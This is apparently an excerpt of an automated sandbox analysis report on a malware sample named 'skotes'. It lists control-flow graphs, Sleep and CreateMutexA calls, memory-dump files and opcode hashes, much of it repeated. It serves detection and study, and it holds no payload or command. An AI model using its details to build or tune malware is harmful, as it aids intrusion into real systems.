                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 9a3a9222831d47195cbcc7fa9def6ef0f92c862f2b802f81abe4d9ece9a52b33
                                                                                                                                                                                                                                                                                          • Instruction ID: 90a07dfdd74a10a69f0674ae14a55bbd2b8e304921f3d965bc169118ada64679
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a3a9222831d47195cbcc7fa9def6ef0f92c862f2b802f81abe4d9ece9a52b33
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C216E717042419BEB18AB6EDCC9BECF761EBC1320F20421EE418DB2D5D77A8981EB11

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 315 fba856-fba86e 316 fba89c-fba89e 315->316 317 fba870-fba87c 315->317 320 fba8a9-fba8b1 call fb7d30 316->320 321 fba8a0-fba8a7 316->321 318 fba87e-fba88c 317->318 319 fba892-fba899 call fcd663 317->319 318->319 322 fba94e 318->322 319->316 332 fba8b3-fba8bb call fb7d30 320->332 333 fba8e4-fba8e6 320->333 324 fba8eb-fba916 call fc80c0 321->324 326 fba953-fba987 Sleep CreateMutexA 322->326 327 fba94e call fe6c6a 322->327 335 fba98e-fba994 326->335 327->326 332->333 339 fba8bd-fba8c5 call fb7d30 332->339 333->324 337 fba9a7-fba9a8 335->337 338 fba996-fba998 335->338 338->337 340 fba99a-fba9a5 338->340 339->333 344 fba8c7-fba8cf call fb7d30 339->344 340->337 344->333 347 fba8d1-fba8d9 call fb7d30 344->347 347->333 350 fba8db-fba8e2 347->350 350->324
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 07ccc44eab4b8fe2306d7d0f32ae3b44bce1351136d6a63af277e7379d3cef27
                                                                                                                                                                                                                                                                                          • Instruction ID: 54e9b63639a07c0a1889a644a4b23264d560f8b16b77a227e270c436417b7d3a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07ccc44eab4b8fe2306d7d0f32ae3b44bce1351136d6a63af277e7379d3cef27
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9214871B442019BFB24776BCC9ABEDB651EF81310F20091BE448DA6C1CA7EC881FA53

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 292 fba34f-fba35b 293 fba35d-fba36b 292->293 294 fba371-fba39a call fcd663 292->294 293->294 295 fba93a 293->295 300 fba3c8-fba916 call fc80c0 294->300 301 fba39c-fba3a8 294->301 297 fba953-fba994 Sleep CreateMutexA 295->297 298 fba93a call fe6c6a 295->298 307 fba9a7-fba9a8 297->307 308 fba996-fba998 297->308 298->297 304 fba3aa-fba3b8 301->304 305 fba3be-fba3c5 call fcd663 301->305 304->295 304->305 305->300 308->307 311 fba99a-fba9a5 308->311 311->307
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 9170ca8a63b228255cb0d90f1eb8549d351ec82a46ca56d9eca7b58538343d56
                                                                                                                                                                                                                                                                                          • Instruction ID: a748928b1653320ed5a58d7f494a7270dac32152353369f5095b81b2b9a9aa5a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9170ca8a63b228255cb0d90f1eb8549d351ec82a46ca56d9eca7b58538343d56
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED2191717002019BE7189B6EDC897ECB7A1EBC1320F24421EE408DB6D4D77A8580EB12
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 32384418-0
                                                                                                                                                                                                                                                                                          • Opcode ID: c64b582584f1ba6f1b77191c70a155b5838d7e0e67f371d6fce0612362c8bbe2
                                                                                                                                                                                                                                                                                          • Instruction ID: f5ee0a315b13735ce78b5442ae3d57aee6f27532b6768a99d802f446fa2a376d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c64b582584f1ba6f1b77191c70a155b5838d7e0e67f371d6fce0612362c8bbe2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BA1F371E41206AFDB10EF65CE45BAAB7A8FF14364F04812DE819D7241EB35EA04EBD1
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
